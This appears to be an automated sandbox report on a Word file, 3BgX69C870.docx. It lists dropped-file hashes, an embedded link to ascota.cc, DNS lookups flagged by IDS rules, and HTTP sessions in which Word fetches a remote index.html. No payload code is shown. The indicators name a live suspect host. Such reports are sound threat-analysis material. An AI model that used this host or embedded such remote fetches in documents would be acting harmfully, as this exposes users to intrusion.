        SHA-256:3F87C5353FAC6F858A4C09090326AD220E6968E5D0A1BF830C6F51157F8DA052
        SHA-512:EE9EBE72770A80954E9EFBA1A1E7CDD36BA5560FF6A97BEC887298DA16F7B26451CC856C1926A1DB9211AFF621B5BD8604976BE1BE8E6EB4EEF007C6C084B16F
        Malicious:false
        Reputation:low
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):0.7949885255254345
        Encrypted:false
        SSDEEP:6:FlIcElClbYeZlYDV5llAabK/W3RtF5GwPxZSuWg:Fl7MClceZiDV7XK8tRZSfg
        MD5:13E2E20732A6309682DD5C15F9F6D98A
        SHA1:AD38FF2C76AD28A9A6F386079F685C4A907C48E8
        SHA-256:DC56243772C94E385579D36ACE9D7B6FEE2D2C3D32D1296568F3B3E351A5258E
        SHA-512:C34D516516E8ED5F7F886513D8FEBA29A1D38ACAB252D9806286757F60CB451401AEEFD7A1E9FDDE31B2C992E1C8CC42C555372E024C9563F7AA357021274C6D
        Malicious:false
        Reputation:low
        Preview:....L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.a.s.c.o.t.a...c.c./.i.n.d.e.x...h.t.m.l.!.". .".". .\.b..... . .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025573008846209794
        Encrypted:false
        SSDEEP:6:I3DPc/G1r9f09HvxggLRxadxqg6cemRXv//4tfnRujlw//+GtluJ/eRuj:I3DP/1r98PY7LdeuvYg3J/
        MD5:83775F54893895A78EFFE9F812647586
        SHA1:7490E5AA0027EFB37EECBC531C50640B0EB337BE
        SHA-256:F626D8232CDE87185CA591A1465567D1CA65545EEE48DEA9B348B5AC2B55E5F4
        SHA-512:6DDF39709B9EE0C06B5419030EF131A90F87524C0404B92D147B6FCEFC691E7FD566AC285FB86EA0F87AD15B6EF361D230F2D22F0CB9FA16E6A64AB56D0535D3
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.02562727762897618
        Encrypted:false
        SSDEEP:6:I3DPc40vAg9HvxggLRzStnuVq/DRXv//4tfnRujlw//+GtluJ/eRuj:I3DPR4Pfsaq9vYg3J/
        MD5:6EE917386A8FA5D27D420C50459CA68B
        SHA1:925B897B79026C15EB7ECC5F665D5405E0AE3F4B
        SHA-256:FC7C7F5A5DF336010466652E52A13390B83E626E2DA3BE7993A1A003566068F5
        SHA-512:0A0C450E857EF5E15F5AF2B868ACA4D115D8CCF57C84858E0AEB6FF2EC319B9EBC7EC306EB06E573A55CB725D73A0A9E4EE24EB712A1304FBBF388E276E4879E
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 16:44:03 2022, mtime=Thu Aug 18 16:44:03 2022, atime=Thu Aug 18 16:44:14 2022, length=15283, window=hide
        Category:dropped
        Size (bytes):1019
        Entropy (8bit):4.555225279433788
        Encrypted:false
        SSDEEP:12:8zec80gXg/XAlCPCHaXBKBnB/wAuX+WB+8lcRAjuicvbIn54FRKNDtZ3YilMMEpS:8zek/XTRKJ8z+8lOUNeUnmODv3qc4u7D
        MD5:C6AFCFF431D2AD77DBD16B768CA7A5D3
        SHA1:7D4958E0A91002B859737C73111F496376935119
        SHA-256:1F8BFA4304CA8986F5FED27006B34A414307240AFD9C9EEE37A95A317E3D31A1
        SHA-512:94B26E8FC8E44B014278905CC264819776E2DBF974542674EA721D388377E6AE61E42EFBDD90B4ECCFA596748912252AE8010D7BF9BE12736EF2F790EBEEFFD8
        Malicious:false
        Preview (binary LNK; readable strings in order, UTF-16 decoded, non-printable bytes omitted):Users, @shell32.dll,-21813, user, Albus, Desktop, @shell32.dll,-21769, 3BGX69~1.DOC, 3BgX69C870.docx, C:\Users\, \\585948\Users.user\Desktop\3BgX69C870.docx, \Desktop\3BgX69C870.docx, S-1-5-21-966771315-3019405637-367336477-1006, 585948
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):72
        Entropy (8bit):4.862798141185997
        Encrypted:false
        SSDEEP:3:bDuMJlI+TXdSemxWYxXdSev:bCd+8
        MD5:5DD5FC2ECB0B586CBAD963A7F61B53DF
        SHA1:EF9B7CB148FD107EF933A72170AD667EC7247051
        SHA-256:AA4697402C69F0571055F140707E6B800F70222BB9A960EC96C3D841E7F35B9B
        SHA-512:9EBFD526875123116426D7619E9317E359E936CD99FCD033189DD8179B8A9FB97113384DD940DB07449F26CFE308707A8C473B5E97F448352D1907CF4F2600EB
        Malicious:false
        Preview:[folders]..Templates.LNK=0..3BgX69C870.LNK=0..[misc]..3BgX69C870.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        File type:Microsoft OOXML
        Entropy (8bit):7.747336678011937
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
        • ZIP compressed archive (8000/1) 7.92%
        File name:3BgX69C870.docx
        File size:15283
        MD5:d805b55d60f9ca73ae71ed68ff692175
        SHA1:947691dbba33dfeb974babcb43d3ceb7991dae29
        SHA256:6a0acf2389d95abc590c8b6a327521312c4de176efce271468817c840745a096
        SHA512:940890f2ad0ba703105b7a18ddef885a11d1930feeea92e554c9734c25784fd4038d4eb43513670ee50f4db3afc7190d92491442075ea58093780570ab9fea40
        SSDEEP:384:e4v4JzIBKmyE084Uv4+dMCl0lnlOM003S7:hvAzIBFyEf5v4+AnXo
        TLSH:6A629E34CC06BC29C51F233C31EA1791FEF8688251A48219F9F805DD5CAE6575B3ABAD
        File Content Preview:PK..........!..l.$l...........[Content_Types].xml...n.0.E......(1tQU..E...T...=..~.6....PT!h...H......L...*[..........p+....m....,Df.S.@I...pp}.......&.d....4..h....`..^...~J...l.........&.1y.A..j6W1{Z......d.M_.*.sNI.".......... ,.k..V..z...=......:...T9
        Icon Hash:e4e6a2a2a4b4b4a4
        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
        08/18/22-10:45:08.539171 | UDP | 2027758 | ET DNS Query for .cc TLD | 55275 | 53 | 192.168.2.22 | 8.8.8.8
        08/18/22-10:45:02.957827 | UDP | 2027758 | ET DNS Query for .cc TLD | 49688 | 53 | 192.168.2.22 | 8.8.8.8
        08/18/22-10:45:02.979786 | UDP | 2027758 | ET DNS Query for .cc TLD | 58836 | 53 | 192.168.2.22 | 8.8.8.8
        08/18/22-10:45:11.469767 | UDP | 2027758 | ET DNS Query for .cc TLD | 59915 | 53 | 192.168.2.22 | 8.8.8.8
        08/18/22-10:44:56.070010 | UDP | 2027758 | ET DNS Query for .cc TLD | 55868 | 53 | 192.168.2.22 | 8.8.8.8
        08/18/22-10:45:11.508650 | UDP | 2027758 | ET DNS Query for .cc TLD | 54408 | 53 | 192.168.2.22 | 8.8.8.8
        08/18/22-10:45:08.507639 | UDP | 2027758 | ET DNS Query for .cc TLD | 50134 | 53 | 192.168.2.22 | 8.8.8.8
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Aug 18, 2022 10:44:56.070009947 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
        Aug 18, 2022 10:44:56.098654032 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
        Aug 18, 2022 10:45:02.957827091 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
        Aug 18, 2022 10:45:02.976468086 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
        Aug 18, 2022 10:45:02.979785919 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
        Aug 18, 2022 10:45:03.008815050 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
        Aug 18, 2022 10:45:08.507638931 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
        Aug 18, 2022 10:45:08.536362886 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
        Aug 18, 2022 10:45:08.539170980 CEST | 55275 | 53 | 192.168.2.22 | 8.8.8.8
        Aug 18, 2022 10:45:08.558255911 CEST | 53 | 55275 | 8.8.8.8 | 192.168.2.22
        Aug 18, 2022 10:45:11.469767094 CEST | 59915 | 53 | 192.168.2.22 | 8.8.8.8
        Aug 18, 2022 10:45:11.503859043 CEST | 53 | 59915 | 8.8.8.8 | 192.168.2.22
        Aug 18, 2022 10:45:11.508650064 CEST | 54408 | 53 | 192.168.2.22 | 8.8.8.8
        Aug 18, 2022 10:45:11.534944057 CEST | 53 | 54408 | 8.8.8.8 | 192.168.2.22

        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
        Aug 18, 2022 10:44:56.070009947 CEST | 192.168.2.22 | 8.8.8.8 | 0x245a | Standard query (0) | ascota.cc | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:02.957827091 CEST | 192.168.2.22 | 8.8.8.8 | 0xdf20 | Standard query (0) | ascota.cc | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:02.979785919 CEST | 192.168.2.22 | 8.8.8.8 | 0x25b4 | Standard query (0) | ascota.cc | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:08.507638931 CEST | 192.168.2.22 | 8.8.8.8 | 0xf2ca | Standard query (0) | ascota.cc | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:08.539170980 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | ascota.cc | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:11.469767094 CEST | 192.168.2.22 | 8.8.8.8 | 0xc2a1 | Standard query (0) | ascota.cc | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:11.508650064 CEST | 192.168.2.22 | 8.8.8.8 | 0xcdf9 | Standard query (0) | ascota.cc | A (IP address) | IN (0x0001)

        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
        Aug 18, 2022 10:44:56.098654032 CEST | 8.8.8.8 | 192.168.2.22 | 0x245a | No error (0) | ascota.cc | (none) | 50.31.246.2 | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:02.976468086 CEST | 8.8.8.8 | 192.168.2.22 | 0xdf20 | No error (0) | ascota.cc | (none) | 50.31.246.2 | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:03.008815050 CEST | 8.8.8.8 | 192.168.2.22 | 0x25b4 | No error (0) | ascota.cc | (none) | 50.31.246.2 | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:08.536362886 CEST | 8.8.8.8 | 192.168.2.22 | 0xf2ca | No error (0) | ascota.cc | (none) | 50.31.246.2 | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:08.558255911 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | ascota.cc | (none) | 50.31.246.2 | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:11.503859043 CEST | 8.8.8.8 | 192.168.2.22 | 0xc2a1 | No error (0) | ascota.cc | (none) | 50.31.246.2 | A (IP address) | IN (0x0001)
        Aug 18, 2022 10:45:11.534944057 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdf9 | No error (0) | ascota.cc | (none) | 50.31.246.2 | A (IP address) | IN (0x0001)
        • ascota.cc
        Session ID: 0 | Source IP: 192.168.2.22 | Source Port: 49171 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:44:56 UTC | 0 | OUT | OPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:44:56 UTC | 0 | IN | HTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR210BRBP96WNT2Q6H320TQ-ams
        date: Thu, 18 Aug 2022 08:44:56 GMT
        content-type: application/xml
        x-amz-request-id: 768J132S0B4T21B2
        x-amz-id-2: d4QSaZ9YlSeHN4P65OLvrd4lB2u8Fq6NGcxO+c4PUM/H9Io+wI87nfv+A7gfx+zqNXPPkoWD0a4=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:44:56 UTC | 0 | IN | Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>768J132S0B4T21B2</RequestId><HostId>d4QSaZ9YlSeHN4P65OLvrd4lB2u8Fq6NGcxO+c4PUM/H9Io+wI87nfv+A7gf
        2022-08-18 08:44:56 UTC | 0 | IN | Data Ascii: 0


        Session ID: 1 | Source IP: 192.168.2.22 | Source Port: 49172 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:03 UTC | 0 | OUT | HEAD /index.html HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        2022-08-18 08:45:03 UTC | 0 | IN | HTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR216RA143D01GW9NXZXFSK-ams
        date: Thu, 18 Aug 2022 08:45:03 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: 2ir0Wh7U0Ee1QxDRpmxUUatBFijqjVp4CAAO7sLOy4jLOlTKs/VHAXlpkbaab5AD9XD5OQ3vC9E=
        x-amz-request-id: RM0PNSRVYN4E7T44
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session ID: 10 | Source IP: 192.168.2.22 | Source Port: 49181 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:11 UTC | 16 | OUT | HEAD /index.html HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        2022-08-18 08:45:11 UTC | 16 | IN | HTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21F2RHB1DBHZK6WQQJ6MK-ams
        date: Thu, 18 Aug 2022 08:45:11 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: IuhFaHvDAeDpDgIfnVq+uXVcHU9JcUXuLukvCt1euFLf4hfQwIcte6N5I4/DhS+6wy/5NBU3lKU=
        x-amz-request-id: PBBEVXDQGTVDF9CR
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session ID: 11 | Source IP: 192.168.2.22 | Source Port: 49182 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:11 UTC | 17 | OUT | GET /index.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: ascota.cc
        If-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMT
        If-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"
        Connection: Keep-Alive
        2022-08-18 08:45:12 UTC | 17 | IN | HTTP/1.1 304 Not Modified
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21FBD37TP13VS06KVKXJ0-ams
        date: Thu, 18 Aug 2022 08:45:12 GMT
        x-amz-id-2: /Nt1AUly0tzTfndLFTVyQ8Cnm/xOqlEtv0TqGH4oKQseruFU5QCGwbKeT21pHrue7YzFJu+PGUg=
        x-amz-request-id: FC4C7WRPCX9ERTTP
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        via: 1.1 fly.io


        Session ID: 12 | Source IP: 192.168.2.22 | Source Port: 49183 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:12 UTC | 18 | OUT | HEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:12 UTC | 18 | IN | HTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21FMTNN2M9KB6JKRFXSKP-ams
        date: Thu, 18 Aug 2022 08:45:12 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: c7mk68b1N1ISSCy5CLEtjdo797ehnKJKyee2aDfQggt6HWSImbsaaCNMyzJ14kAt/iiwIzVJwRd2YkxvGGnaqQ==
        x-amz-request-id: FC436W0W6F4HFQZ5
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session ID: 13 | Source IP: 192.168.2.22 | Source Port: 49184 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:12 UTC | 18 | OUT | HEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:12 UTC | 18 | IN | HTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21G4SWQ5H9CNY42Z3BHZ4-ams
        date: Thu, 18 Aug 2022 08:45:12 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: ycyuRI5+NbpIDfx6FxQbtaxkCLc5TFsZxZWjBHit20DGILG9TYs8j3lgeG38c3dXkTleIWKNDuw=
        x-amz-request-id: FC41SAMNW4ZDDAQ6
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session ID: 14 | Source IP: 192.168.2.22 | Source Port: 49185 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:12 UTC | 19 | OUT | GET /index.html HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: ascota.cc
        If-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMT
        If-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"
        Connection: Keep-Alive
        2022-08-18 08:45:13 UTC | 19 | IN | HTTP/1.1 304 Not Modified
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21GDH0TDH0ATQ1GWWZZ8H-ams
        date: Thu, 18 Aug 2022 08:45:13 GMT
        x-amz-id-2: Bpzzztlz16vdeJyiYG+WwvEBLAYbVKxmP7DB2nprcIDZnrgMFRWv6Bm+3jVBQF1iExc+5q335ng=
        x-amz-request-id: 5ABDY4R98TSNNASA
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        via: 1.1 fly.io


        Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49173 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:08 UTC | 1 | OUT | OPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
        2022-08-18 08:45:08 UTC | 1 | IN | HTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21C5WQ7EEE4BFA1ZZV84V-ams
        date: Thu, 18 Aug 2022 08:45:08 GMT
        content-type: application/xml
        x-amz-request-id: XSQGW29MK512DM3T
        x-amz-id-2: mwYL4EedNOPgCARydvDp9oQg8znlxzY4ajr97QzUsjgMJSxpIxXfLl85O4uGrNnA7w8Wq5PSDHs=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:08 UTC | 1 | IN | Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>XSQGW29MK512DM3T</RequestId><HostId>mwYL4EedNOPgCARydvDp9oQg8znlxzY4ajr97QzUsjgMJSxpIxXfLl85O4uG
        2022-08-18 08:45:08 UTC | 2 | IN | Data Ascii: 0


        Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49174 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:08 UTC | 2 | OUT | OPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
        2022-08-18 08:45:09 UTC | 2 | IN | HTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21CHFQ62V70GTWY0546GR-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: application/xml
        x-amz-request-id: YNG5XBXWTCRVTJW9
        x-amz-id-2: joJD9vCOXZWuY5cnxPLgORWIlQkMw1ZjcknPVN1GC/nbGGsl2W7dL/WA7w9XvJx+qayLCvE48hU=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:09 UTC | 2 | IN | Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>YNG5XBXWTCRVTJW9</RequestId><HostId>joJD9vCOXZWuY5cnxPLgORWIlQkMw1ZjcknPVN1GC/nbGGsl2W7dL/WA7w9X
        2022-08-18 08:45:09 UTC | 2 | IN | Data Ascii: 0


        Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49175 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:09 UTC | 2 | OUT | OPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
        2022-08-18 08:45:09 UTC | 3 | IN | HTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21CT53GWGJWQP08YN975E-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: application/xml
        x-amz-request-id: YNG0WC4RDWRQKZ8M
        x-amz-id-2: 1wSvxDCH+FpZcpiChvHVSeCnFKFVwIWhVeLGKpr+ZbZrJNUT884hbMl4hdBZ2GUf94wlwJ5DU3Y=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:09 UTC | 3 | IN | Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>YNG0WC4RDWRQKZ8M</RequestId><HostId>1wSvxDCH+FpZcpiChvHVSeCnFKFVwIWhVeLGKpr+ZbZrJNUT884hbMl4hdBZ
        2022-08-18 08:45:09 UTC | 3 | IN | Data Ascii: 0


        Session ID: 5 | Source IP: 192.168.2.22 | Source Port: 49176 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:09 UTC | 3 | OUT | OPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
        2022-08-18 08:45:09 UTC | 3 | IN | HTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21D2DWR96GM644V4CS0C7-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: application/xml
        x-amz-request-id: YNGAJTFAEDQRFK89
        x-amz-id-2: 2S20O3UKJkTANDci9RbTNIxMTHStwbp6gYGfPmiAIxlPQCG1JwxNsj4X448U3KEouJUxK44psr8=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:09 UTC | 4 | IN | Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>YNGAJTFAEDQRFK89</RequestId><HostId>2S20O3UKJkTANDci9RbTNIxMTHStwbp6gYGfPmiAIxlPQCG1JwxNsj4X448U
        2022-08-18 08:45:09 UTC | 4 | IN | Data Ascii: 0


        Session ID: 6 | Source IP: 192.168.2.22 | Source Port: 49177 | Destination IP: 50.31.246.2 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Timestamp | kBytes transferred | Direction | Data
        2022-08-18 08:45:09 UTC | 4 | OUT | GET /index.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: ascota.cc
        Connection: Keep-Alive
        2022-08-18 08:45:10 UTC | 4 | IN | HTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21DBDTEDA54EJ48R2VCYW-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
